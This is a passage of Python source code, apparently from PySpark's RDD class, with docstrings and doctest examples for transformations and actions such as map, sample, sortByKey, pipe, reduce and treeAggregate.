Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
.. versionchanged:: 3.0.0
Added optional argument `blocking` to specify whether to block until all
blocks are deleted.
"""
self.is_cached = False
self._jrdd.unpersist(blocking)
return self
def checkpoint(self) -> None:
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with :meth:`SparkContext.setCheckpointDir` and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self) -> bool:
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self) -> None:
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
`spark.dynamicAllocation.cachedExecutorIdleTimeout` to a high value.
The checkpoint directory set through :meth:`SparkContext.setCheckpointDir` is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self) -> bool:
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self) -> Optional[str]:
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
return checkpointFile.get() if checkpointFile.isDefined() else None
def map(self: "RDD[T]", f: Callable[[T], U], preservesPartitioning: bool = False) -> "RDD[U]":
"""
Return a new RDD by applying a function to each element of this RDD.
Examples
--------
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_: int, iterator: Iterable[T]) -> Iterable[U]:
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(
self: "RDD[T]", f: Callable[[T], Iterable[U]], preservesPartitioning: bool = False
) -> "RDD[U]":
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
Examples
--------
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(_: int, iterator: Iterable[T]) -> Iterable[U]:
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(
self: "RDD[T]", f: Callable[[Iterable[T]], Iterable[U]], preservesPartitioning: bool = False
) -> "RDD[U]":
"""
Return a new RDD by applying a function to each partition of this RDD.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(_: int, iterator: Iterable[T]) -> Iterable[U]:
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(
self: "RDD[T]",
f: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
) -> "RDD[U]":
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(
self: "RDD[T]",
f: Callable[[int, Iterable[T]], Iterable[U]],
preservesPartitioning: bool = False,
) -> "RDD[U]":
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
.. deprecated:: 0.9.0
use :py:meth:`RDD.mapPartitionsWithIndex` instead.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn(
"mapPartitionsWithSplit is deprecated; use mapPartitionsWithIndex instead",
FutureWarning,
stacklevel=2,
)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self) -> int:
"""
Returns the number of partitions in RDD
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self: "RDD[T]", f: Callable[[T], bool]) -> "RDD[T]":
"""
Return a new RDD containing only the elements that satisfy a predicate.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator: Iterable[T]) -> Iterable[T]:
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self: "RDD[T]", numPartitions: Optional[int] = None) -> "RDD[T]":
"""
Return a new RDD containing the distinct elements in this RDD.
Examples
--------
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return (
self.map(lambda x: (x, None))
.reduceByKey(lambda x, _: x, numPartitions)
.map(lambda x: x[0])
)
def sample(
self: "RDD[T]", withReplacement: bool, fraction: float, seed: Optional[int] = None
) -> "RDD[T]":
"""
Return a sampled subset of this RDD.
Parameters
----------
withReplacement : bool
can elements be sampled multiple times (replaced when sampled out)
fraction : float
expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be in [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
seed : int, optional
seed for the random number generator
Notes
-----
This is not guaranteed to provide exactly the fraction specified of the total
count of this :class:`RDD`.
Examples
--------
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(
self: "RDD[T]", weights: Sequence[Union[int, float]], seed: Optional[int] = None
) -> "List[RDD[T]]":
"""
Randomly splits this RDD with the provided weights.
Parameters
----------
weights : list
weights for splits, will be normalized if they don't sum to 1
seed : int, optional
random seed
Returns
-------
list
split RDDs in a list
Examples
--------
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [
self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])
]
# this is ported from scala/spark/RDD.scala
def takeSample(
self: "RDD[T]", withReplacement: bool, num: int, seed: Optional[int] = None
) -> List[T]:
"""
Return a fixed-size sampled subset of this RDD.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
Examples
--------
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError("Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(
sampleSizeLowerBound: int, total: int, withReplacement: bool
) -> float:
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
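Examples
--------
A hedged sanity check (illustrative only): for num=10 out of total=100, the
returned rate exceeds the naive ratio num / total in both sampling modes.
>>> RDD._computeFractionForSampleSize(10, 100, True) > 10 / 100
True
>>> RDD._computeFractionForSampleSize(10, 100, False) > 10 / 100
True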
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if sampleSizeLowerBound < 12:
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = -log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self: "RDD[T]", other: "RDD[U]") -> "RDD[Union[T, U]]":
"""
Return the union of this RDD and another one.
Examples
--------
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd: "RDD[Union[T, U]]" = RDD(
self._jrdd.union(other._jrdd), self.ctx, self._jrdd_deserializer
)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx, self.ctx.serializer)
if (
self.partitioner == other.partitioner
and self.getNumPartitions() == rdd.getNumPartitions()
):
rdd.partitioner = self.partitioner
return rdd
def intersection(self: "RDD[T]", other: "RDD[T]") -> "RDD[T]":
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
Notes
-----
This method performs a shuffle internally.
Examples
--------
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return (
self.map(lambda v: (v, None))
.cogroup(other.map(lambda v: (v, None)))
.filter(lambda k_vs: all(k_vs[1]))
.keys()
)
def _reserialize(self: "RDD[T]", serializer: Optional[Serializer] = None) -> "RDD[T]":
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self: "RDD[T]", other: "RDD[U]") -> "RDD[Union[T, U]]":
"""
Return the union of this RDD and another one.
Examples
--------
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
@overload
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[S, V]]",
numPartitions: Optional[int] = ...,
partitionFunc: Callable[["S"], int] = ...,
ascending: bool = ...,
) -> "RDD[Tuple[S, V]]":
...
@overload
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int],
partitionFunc: Callable[[K], int],
ascending: bool,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
@overload
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[K, V]]",
numPartitions: Optional[int] = ...,
partitionFunc: Callable[[K], int] = ...,
ascending: bool = ...,
*,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
def repartitionAndSortWithinPartitions(
self: "RDD[Tuple[Any, Any]]",
numPartitions: Optional[int] = None,
partitionFunc: Callable[[Any], int] = portable_hash,
ascending: bool = True,
keyfunc: Callable[[Any], Any] = lambda x: x,
) -> "RDD[Tuple[Any, Any]]":
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
Examples
--------
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, V]]:
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
@overload
def sortByKey(
self: "RDD[Tuple[S, V]]",
ascending: bool = ...,
numPartitions: Optional[int] = ...,
) -> "RDD[Tuple[K, V]]":
...
@overload
def sortByKey(
self: "RDD[Tuple[K, V]]",
ascending: bool,
numPartitions: int,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
@overload
def sortByKey(
self: "RDD[Tuple[K, V]]",
ascending: bool = ...,
numPartitions: Optional[int] = ...,
*,
keyfunc: Callable[[K], "S"],
) -> "RDD[Tuple[K, V]]":
...
def sortByKey(
self: "RDD[Tuple[K, V]]",
ascending: Optional[bool] = True,
numPartitions: Optional[int] = None,
keyfunc: Callable[[Any], Any] = lambda x: x,
) -> "RDD[Tuple[K, V]]":
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
Examples
--------
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator: Iterable[Tuple[K, V]]) -> Iterable[Tuple[K, V]]:
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of them has
# an implicit boundary
bounds = [
samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)
]
def rangePartitioner(k: K) -> int:
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p # type: ignore[operator]
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(
self: "RDD[T]",
keyfunc: Callable[[T], "S"],
ascending: bool = True,
numPartitions: Optional[int] = None,
) -> "RDD[T]":
"""
Sorts this RDD by the given keyfunc.
Examples
--------
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return (
self.keyBy(keyfunc) # type: ignore[type-var]
.sortByKey(ascending, numPartitions)
.values()
)
def glom(self: "RDD[T]") -> "RDD[List[T]]":
"""
Return an RDD created by coalescing all elements within each partition
into a list.
Examples
--------
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator: Iterable[T]) -> Iterable[List[T]]:
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self: "RDD[T]", other: "RDD[U]") -> "RDD[Tuple[T, U]]":
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements ``(a, b)`` where ``a`` is in `self` and
``b`` is in `other`.
Examples
--------
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer, other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(
self: "RDD[T]",
f: Callable[[T], K],
numPartitions: Optional[int] = None,
partitionFunc: Callable[[K], int] = portable_hash,
) -> "RDD[Tuple[K, Iterable[T]]]":
"""
Return an RDD of grouped items.
Examples
--------
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions, partitionFunc)
def pipe(
self, command: str, env: Optional[Dict[str, str]] = None, checkCode: bool = False
) -> "RDD[str]":
"""
Return an RDD created by piping elements to a forked external process.
Parameters
----------
command : str
command to run.
env : dict, optional
environment variables to set.
checkCode : bool, optional
whether or not to check the return value of the shell command.
Examples
--------
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
if env is None:
env = dict()
def func(iterator: Iterable[T]) -> Iterable[str]:
pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out: IO[bytes]) -> None:
for obj in iterator:
s = str(obj).rstrip("\n") + "\n"
out.write(s.encode("utf-8"))
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
def check_return_code() -> Iterable[int]:
pipe.wait()
if checkCode and pipe.returncode:
raise RuntimeError(
"Pipe function `%s' exited "
"with error code %d" % (command, pipe.returncode)
)
else:
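# Intentionally yields nothing: keeping check_return_code a generator lets it
# be chained after the stdout iterator below, so the return-code check only
# runs once the child's output has been fully drained.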
for i in range(0):
yield i
return (
cast(bytes, x).rstrip(b"\n").decode("utf-8")
for x in chain(
iter(cast(IO[bytes], pipe.stdout).readline, b""), check_return_code()
)
)
return self.mapPartitions(func)
def foreach(self: "RDD[T]", f: Callable[[T], None]) -> None:
"""
Applies a function to all elements of this RDD.
Examples
--------
>>> def f(x): print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
f = fail_on_stopiteration(f)
def processPartition(iterator: Iterable[T]) -> Iterable[Any]:
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self: "RDD[T]", f: Callable[[Iterable[T]], None]) -> None:
"""
Applies a function to each partition of this RDD.
Examples
--------
>>> def f(iterator):
... for x in iterator:
... print(x)
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it: Iterable[T]) -> Iterable[Any]:
r = f(it)
try:
return iter(r) # type: ignore[call-overload]
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self: "RDD[T]") -> List[T]:
"""
Return a list that contains all of the elements in this RDD.
Notes
-----
This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
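Examples
--------
A minimal sketch, assuming the doctest SparkContext ``sc``:
>>> sorted(sc.parallelize([1, 2, 3, 4], 2).collect())
[1, 2, 3, 4]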
"""
with SCCallSiteSync(self.context):
assert self.ctx._jvm is not None
sock_info = self.ctx._jvm.PythonRDD.collectAndServe(self._jrdd.rdd())
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def collectWithJobGroup(
self: "RDD[T]", groupId: str, description: str, interruptOnCancel: bool = False
) -> "List[T]":
"""
When collecting this RDD, use this method to specify a job group.
.. versionadded:: 3.0.0
.. deprecated:: 3.1.0
Use :class:`pyspark.InheritableThread` with the pinned thread mode enabled.
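Examples
--------
A hedged sketch (not executed here; the group id and description are
arbitrary placeholders):
>>> sc.parallelize([1, 2, 3]).collectWithJobGroup(  # doctest: +SKIP
...     "my-group", "example collect")
[1, 2, 3]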
"""
warnings.warn(
"Deprecated in 3.1, Use pyspark.InheritableThread with "
"the pinned thread mode enabled.",
FutureWarning,
)
with SCCallSiteSync(self.context):
assert self.ctx._jvm is not None
sock_info = self.ctx._jvm.PythonRDD.collectAndServeWithJobGroup(
self._jrdd.rdd(), groupId, description, interruptOnCancel
)
return list(_load_from_socket(sock_info, self._jrdd_deserializer))
def reduce(self: "RDD[T]", f: Callable[[T, T], T]) -> T:
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
Examples
--------
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
f = fail_on_stopiteration(f)
def func(iterator: Iterable[T]) -> Iterable[T]:
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self: "RDD[T]", f: Callable[[T, T], T], depth: int = 2) -> T:
"""
Reduces the elements of this RDD in a multi-level tree pattern.
Parameters
----------
f : function
depth : int, optional
suggested depth of the tree (default: 2)
Examples
--------
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
# Use the second entry to indicate whether this is a dummy value.
zeroValue: Tuple[T, bool] = ( # type: ignore[assignment]
None,
True,
)
def op(x: Tuple[T, bool], y: Tuple[T, bool]) -> Tuple[T, bool]:
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False # type: ignore[arg-type]
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self: "RDD[T]", zeroValue: T, op: Callable[[T, T], T]) -> T:
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero value."
The function ``op(t1, t2)`` is allowed to modify ``t1`` and return it
as its result value to avoid object allocation; however, it should not
modify ``t2``.
This behaves somewhat differently from fold operations implemented
for non-distributed collections in functional languages like Scala.
This fold operation may be applied to partitions individually, and then
fold those results into the final result, rather than apply the fold
to each element sequentially in some defined ordering. For functions
that are not commutative, the result may differ from that of a fold
applied to a non-distributed collection.
Examples
--------
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
op = fail_on_stopiteration(op)
def func(iterator: Iterable[T]) -> Iterable[T]:
acc = zeroValue
for obj in iterator:
acc = op(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(
self: "RDD[T]", zeroValue: U, seqOp: Callable[[U, T], U], combOp: Callable[[U, U], U]
) -> U:
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions ``op(t1, t2)`` are allowed to modify ``t1`` and return it
as their result value to avoid object allocation; however, they should not
modify ``t2``.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
a U and one operation for merging two U's.
Examples
--------
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
seqOp = fail_on_stopiteration(seqOp)
combOp = fail_on_stopiteration(combOp)
def func(iterator: Iterable[T]) -> Iterable[U]:
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
# collecting result of mapPartitions here ensures that the copy of
# zeroValue provided to each partition is unique from the one provided
# to the final reduce call
vals = self.mapPartitions(func).collect()
return reduce(combOp, vals, zeroValue)
def treeAggregate(
self: "RDD[T]",
zeroValue: U,
seqOp: Callable[[U, T], U],
combOp: Callable[[U, U], U],
depth: int = 2,
) -> U:
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
Parameters
----------
depth : int, optional
suggested depth of the tree (default: 2)
Examples
--------
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator: Iterable[T]) -> Iterable[U]:
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale # type: ignore[assignment]
curNumPartitions = int(numPartitions)
def mapPartition(i: int, iterator: Iterable[U]) -> Iterable[Tuple[int, U]]:
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = (
partiallyAggregated.mapPartitionsWithIndex(mapPartition)
.reduceByKey(combOp, curNumPartitions)
.values()
)
return partiallyAggregated.reduce(combOp)
@overload
def max(self: "RDD[S]") -> "S":
...
@overload
def max(self: "RDD[T]", key: Callable[[T], "S"]) -> T:
...
def max(self: "RDD[T]", key: Optional[Callable[[T], "S"]] = None) -> T:
"""
Find the maximum item in this RDD.
Parameters
----------
key : function, optional
A function used to generate key for comparing
Examples
--------
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max) # type: ignore[arg-type]
return self.reduce(lambda a, b: max(a, b, key=key)) # type: ignore[arg-type]
@overload
def min(self: "RDD[S]") -> "S":
...
@overload
def min(self: "RDD[T]", key: Callable[[T], "S"]) -> T:
...
def min(self: "RDD[T]", key: Optional[Callable[[T], "S"]] = None) -> T:
"""
Find the minimum item in this RDD.
Parameters
----------
key : function, optional
A function used to generate key for comparing
Examples
--------
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min) # type: ignore[arg-type]
return self.reduce(lambda a, b: min(a, b, key=key)) # type: ignore[arg-type]
def sum(self: "RDD[NumberOrArray]") -> "NumberOrArray":
"""
Add up the elements in this RDD.
Examples
--------
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).fold( # type: ignore[return-value]
0, operator.add
)
def count(self) -> int:
"""
Return the number of elements in this RDD.
Examples
--------
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self: "RDD[NumberOrArray]") -> StatCounter:
"""
Return a :class:`StatCounter` object that captures the mean, variance
and count of the RDD's elements in one operation.
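Examples
--------
A minimal sketch, assuming the doctest SparkContext ``sc``:
>>> sc.parallelize([1.0, 2.0, 3.0]).stats().mean()
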